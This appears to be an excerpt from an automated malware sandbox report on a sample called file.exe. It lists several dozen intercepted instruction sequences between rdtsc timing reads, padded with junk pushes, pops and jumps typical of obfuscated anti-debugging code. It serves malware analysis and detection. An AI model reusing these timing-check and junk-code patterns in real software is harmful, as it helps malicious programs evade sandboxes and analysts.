Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260D4C second address: 7260DEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b pushad 0x0000000c mov dx, si 0x0000000f popad 0x00000010 js 00007F715EDDCF1Dh 0x00000016 jmp 00007F70F070E5CDh 0x0000001b mov eax, dword ptr [ebp-04h] 0x0000001e jmp 00007F70F070E5CEh 0x00000023 mov dword ptr [esi+08h], eax 0x00000026 jmp 00007F70F070E5D0h 0x0000002b lea eax, dword ptr [ebx+70h] 0x0000002e pushad 0x0000002f mov cx, 091Dh 0x00000033 mov si, 1A19h 0x00000037 popad 0x00000038 push 00000001h 0x0000003a jmp 00007F70F070E5D4h 0x0000003f nop 0x00000040 jmp 00007F70F070E5D0h 0x00000045 push eax 0x00000046 pushad 0x00000047 mov bh, 0Ch 0x00000049 popad 0x0000004a nop 0x0000004b pushad 0x0000004c jmp 00007F70F070E5D2h 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 pop edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260DEA second address: 7260E43 instructions: 0x00000000 rdtsc 0x00000002 call 00007F70F0BCDB0Ch 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b lea eax, dword ptr [ebp-18h] 0x0000000e jmp 00007F70F0BCDB11h 0x00000013 nop 0x00000014 jmp 00007F70F0BCDB0Eh 0x00000019 push eax 0x0000001a jmp 00007F70F0BCDB0Bh 0x0000001f nop 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F70F0BCDB15h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260E87 second address: 7260EBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007F70F070E5D3h 0x00000013 pop eax 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260EBE second address: 7260EF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB15h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F715F29C2DEh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov bh, 1Bh 0x00000014 jmp 00007F70F0BCDB14h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260EF7 second address: 7260F42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 409C21B4h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp-14h] 0x0000000e pushad 0x0000000f movzx esi, di 0x00000012 push ebx 0x00000013 mov ebx, ecx 0x00000015 pop esi 0x00000016 popad 0x00000017 mov ecx, esi 0x00000019 pushad 0x0000001a push edx 0x0000001b mov cx, 7C67h 0x0000001f pop ecx 0x00000020 pushfd 0x00000021 jmp 00007F70F070E5CDh 0x00000026 jmp 00007F70F070E5CBh 0x0000002b popfd 0x0000002c popad 0x0000002d mov dword ptr [esi+0Ch], eax 0x00000030 pushad 0x00000031 pushad 0x00000032 mov edx, eax 0x00000034 mov ecx, 4850B39Dh 0x00000039 popad 0x0000003a push ecx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260F42 second address: 7260F53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov edx, 759B06ECh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260F53 second address: 7260F6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260F6A second address: 7260F82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F0BCDB14h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260F82 second address: 7260F94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260F94 second address: 7260F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260F9B second address: 7260FF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lock cmpxchg dword ptr [edx], ecx 0x0000000d pushad 0x0000000e call 00007F70F070E5CDh 0x00000013 call 00007F70F070E5D0h 0x00000018 pop eax 0x00000019 pop edx 0x0000001a popad 0x0000001b pop edi 0x0000001c jmp 00007F70F070E5CEh 0x00000021 test eax, eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F70F070E5CAh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260FF3 second address: 7260FF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7260FF9 second address: 7261029 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F715EDDCC97h 0x0000000f pushad 0x00000010 mov bx, si 0x00000013 mov ebx, esi 0x00000015 popad 0x00000016 mov edx, dword ptr [ebp+08h] 0x00000019 pushad 0x0000001a push edx 0x0000001b push esi 0x0000001c pop ebx 0x0000001d pop eax 0x0000001e popad 0x0000001f mov eax, dword ptr [esi] 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7261029 second address: 7261039 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7261039 second address: 7261122 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx], eax 0x0000000b jmp 00007F70F070E5D6h 0x00000010 mov eax, dword ptr [esi+04h] 0x00000013 jmp 00007F70F070E5D0h 0x00000018 mov dword ptr [edx+04h], eax 0x0000001b jmp 00007F70F070E5D0h 0x00000020 mov eax, dword ptr [esi+08h] 0x00000023 pushad 0x00000024 call 00007F70F070E5CEh 0x00000029 push eax 0x0000002a pop edi 0x0000002b pop eax 0x0000002c pushfd 0x0000002d jmp 00007F70F070E5D7h 0x00000032 sub ax, 311Eh 0x00000037 jmp 00007F70F070E5D9h 0x0000003c popfd 0x0000003d popad 0x0000003e mov dword ptr [edx+08h], eax 0x00000041 pushad 0x00000042 mov esi, 45722683h 0x00000047 mov si, A7DFh 0x0000004b popad 0x0000004c mov eax, dword ptr [esi+0Ch] 0x0000004f pushad 0x00000050 mov si, B3D7h 0x00000054 pushfd 0x00000055 jmp 00007F70F070E5CCh 0x0000005a add si, AE48h 0x0000005f jmp 00007F70F070E5CBh 0x00000064 popfd 0x00000065 popad 0x00000066 mov dword ptr [edx+0Ch], eax 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007F70F070E5D5h 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7261122 second address: 726117E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F70F0BCDB17h 0x00000009 xor ah, FFFFFFEEh 0x0000000c jmp 00007F70F0BCDB19h 0x00000011 popfd 0x00000012 mov dx, ax 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov eax, dword ptr [esi+10h] 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F70F0BCDB19h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726117E second address: 72611CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+10h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F70F070E5D3h 0x00000015 adc ch, 0000000Eh 0x00000018 jmp 00007F70F070E5D9h 0x0000001d popfd 0x0000001e push eax 0x0000001f pop edx 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72611CD second address: 72611E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72611E7 second address: 72611FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72611FA second address: 7261221 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+14h], eax 0x0000000c pushad 0x0000000d movzx esi, di 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7261221 second address: 7261287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F70F070E5D5h 0x0000000a and cl, FFFFFFB6h 0x0000000d jmp 00007F70F070E5D1h 0x00000012 popfd 0x00000013 popad 0x00000014 popad 0x00000015 mov eax, dword ptr [esi+18h] 0x00000018 pushad 0x00000019 movzx esi, dx 0x0000001c mov edi, 18ABB7ECh 0x00000021 popad 0x00000022 mov dword ptr [edx+18h], eax 0x00000025 jmp 00007F70F070E5CBh 0x0000002a mov eax, dword ptr [esi+1Ch] 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F70F070E5D5h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7261287 second address: 726128C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7261380 second address: 72613DE instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F70F070E5D0h 0x00000008 add eax, 7B53F9D8h 0x0000000e jmp 00007F70F070E5CBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov dword ptr [edx+24h], eax 0x0000001a jmp 00007F70F070E5D6h 0x0000001f mov eax, dword ptr [esi+28h] 0x00000022 jmp 00007F70F070E5D0h 0x00000027 mov dword ptr [edx+28h], eax 0x0000002a pushad 0x0000002b mov di, si 0x0000002e push esi 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72613DE second address: 72613EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov ecx, dword ptr [esi+2Ch] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72613EC second address: 7261414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 mov al, DEh 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a popad 0x0000000b mov dword ptr [edx+2Ch], ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F70F070E5D8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7261414 second address: 7261484 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [esi+30h] 0x0000000d jmp 00007F70F0BCDB16h 0x00000012 mov word ptr [edx+30h], ax 0x00000016 pushad 0x00000017 call 00007F70F0BCDB0Eh 0x0000001c pushfd 0x0000001d jmp 00007F70F0BCDB12h 0x00000022 sub si, 94E8h 0x00000027 jmp 00007F70F0BCDB0Bh 0x0000002c popfd 0x0000002d pop esi 0x0000002e mov dx, C52Ch 0x00000032 popad 0x00000033 mov ax, word ptr [esi+32h] 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7261484 second address: 7261488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7261488 second address: 72614A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72614A4 second address: 72614AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72614AA second address: 72614AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72614AE second address: 72614B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72614B2 second address: 7261507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [edx+32h], ax 0x0000000c jmp 00007F70F0BCDB19h 0x00000011 mov eax, dword ptr [esi+34h] 0x00000014 pushad 0x00000015 call 00007F70F0BCDB0Ch 0x0000001a jmp 00007F70F0BCDB12h 0x0000001f pop ecx 0x00000020 movsx ebx, ax 0x00000023 popad 0x00000024 mov dword ptr [edx+34h], eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7261507 second address: 726150B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726150B second address: 726151A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726151A second address: 726155F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 pushfd 0x00000007 jmp 00007F70F070E5CBh 0x0000000c xor ecx, 147371AEh 0x00000012 jmp 00007F70F070E5D9h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b test ecx, 00000700h 0x00000021 pushad 0x00000022 mov esi, 57B6B6D3h 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726155F second address: 7261563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7261563 second address: 726157F instructions: 0x00000000 rdtsc 0x00000002 mov edi, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jne 00007F715EDDC773h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F70F070E5CDh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726157F second address: 726158F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F0BCDB0Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726158F second address: 7261606 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b or dword ptr [edx+38h], FFFFFFFFh 0x0000000f jmp 00007F70F070E5D6h 0x00000014 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000018 jmp 00007F70F070E5D0h 0x0000001d or dword ptr [edx+40h], FFFFFFFFh 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F70F070E5CEh 0x00000028 or cl, 00000048h 0x0000002b jmp 00007F70F070E5CBh 0x00000030 popfd 0x00000031 movzx ecx, di 0x00000034 popad 0x00000035 pop esi 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F70F070E5CEh 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7261606 second address: 7261640 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 movsx edx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c jmp 00007F70F0BCDB14h 0x00000011 leave 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F70F0BCDB17h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72B0CBD second address: 72B0CC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72B0CC1 second address: 72B0CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, edx 0x00000008 popad 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F70F0BCDB14h 0x00000015 sbb ecx, 5283C078h 0x0000001b jmp 00007F70F0BCDB0Bh 0x00000020 popfd 0x00000021 mov ebx, ecx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71F005E second address: 71F0064 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71F0064 second address: 71F0068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71F0068 second address: 71F006C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71F006C second address: 71F008A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F70F0BCDB11h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71F008A second address: 71F0090 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71F06CF second address: 71F06D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71F06D6 second address: 71F0749 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F70F070E5D4h 0x00000011 sbb eax, 71A62AD8h 0x00000017 jmp 00007F70F070E5CBh 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007F70F070E5D8h 0x00000023 or ch, 00000038h 0x00000026 jmp 00007F70F070E5CBh 0x0000002b popfd 0x0000002c popad 0x0000002d mov ebp, esp 0x0000002f pushad 0x00000030 mov ebx, ecx 0x00000032 movzx ecx, bx 0x00000035 popad 0x00000036 pop ebp 0x00000037 pushad 0x00000038 push edi 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71F0AEF second address: 71F0B01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F0BCDB0Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71F0B01 second address: 71F0B2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov di, ax 0x0000000d mov cx, 3FC5h 0x00000011 popad 0x00000012 mov dword ptr [esp], ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F70F070E5D7h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7240A8D second address: 7240A91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7240A91 second address: 7240A97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7240A97 second address: 7240AA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F0BCDB0Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7220008 second address: 72200C1 instructions: 0x00000000 rdtsc 0x00000002 mov esi, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ax, bx 0x00000009 popad 0x0000000a push ecx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F70F070E5D4h 0x00000012 add si, BA18h 0x00000017 jmp 00007F70F070E5CBh 0x0000001c popfd 0x0000001d jmp 00007F70F070E5D8h 0x00000022 popad 0x00000023 mov dword ptr [esp], ebp 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F70F070E5CEh 0x0000002d xor cx, 9BA8h 0x00000032 jmp 00007F70F070E5CBh 0x00000037 popfd 0x00000038 popad 0x00000039 mov ebp, esp 0x0000003b jmp 00007F70F070E5D2h 0x00000040 and esp, FFFFFFF0h 0x00000043 jmp 00007F70F070E5D0h 0x00000048 sub esp, 44h 0x0000004b pushad 0x0000004c mov ebx, esi 0x0000004e popad 0x0000004f xchg eax, ebx 0x00000050 jmp 00007F70F070E5D4h 0x00000055 push eax 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 mov ecx, edi 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72200C1 second address: 722011E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 movzx ecx, dx 0x0000000c popad 0x0000000d xchg eax, ebx 0x0000000e pushad 0x0000000f pushad 0x00000010 push edi 0x00000011 pop esi 0x00000012 mov bx, A10Eh 0x00000016 popad 0x00000017 pushfd 0x00000018 jmp 00007F70F0BCDB0Fh 0x0000001d jmp 00007F70F0BCDB13h 0x00000022 popfd 0x00000023 popad 0x00000024 xchg eax, esi 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 call 00007F70F0BCDB0Bh 0x0000002d pop ecx 0x0000002e push ebx 0x0000002f pop ecx 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722011E second address: 722015E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F70F070E5CBh 0x0000000f xchg eax, esi 0x00000010 jmp 00007F70F070E5D6h 0x00000015 xchg eax, edi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722015E second address: 7220164 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7220164 second address: 722016A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722016A second address: 722016E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722016E second address: 7220183 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov eax, 03220245h 0x00000011 movzx eax, di 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7220183 second address: 72201CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F70F0BCDB0Ah 0x00000009 jmp 00007F70F0BCDB15h 0x0000000e popfd 0x0000000f jmp 00007F70F0BCDB10h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, edi 0x00000018 pushad 0x00000019 call 00007F70F0BCDB0Eh 0x0000001e pop ebx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72201CE second address: 722020A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F70F070E5CAh 0x0000000a sbb si, 1698h 0x0000000f jmp 00007F70F070E5CBh 0x00000014 popfd 0x00000015 popad 0x00000016 popad 0x00000017 mov edi, dword ptr [ebp+08h] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F70F070E5D5h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722020A second address: 722021A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F0BCDB0Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722021A second address: 7220237 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+24h], 00000000h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov eax, 2EDD291Fh 0x00000018 mov cx, 383Bh 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7220237 second address: 7220241 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 1D299D22h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
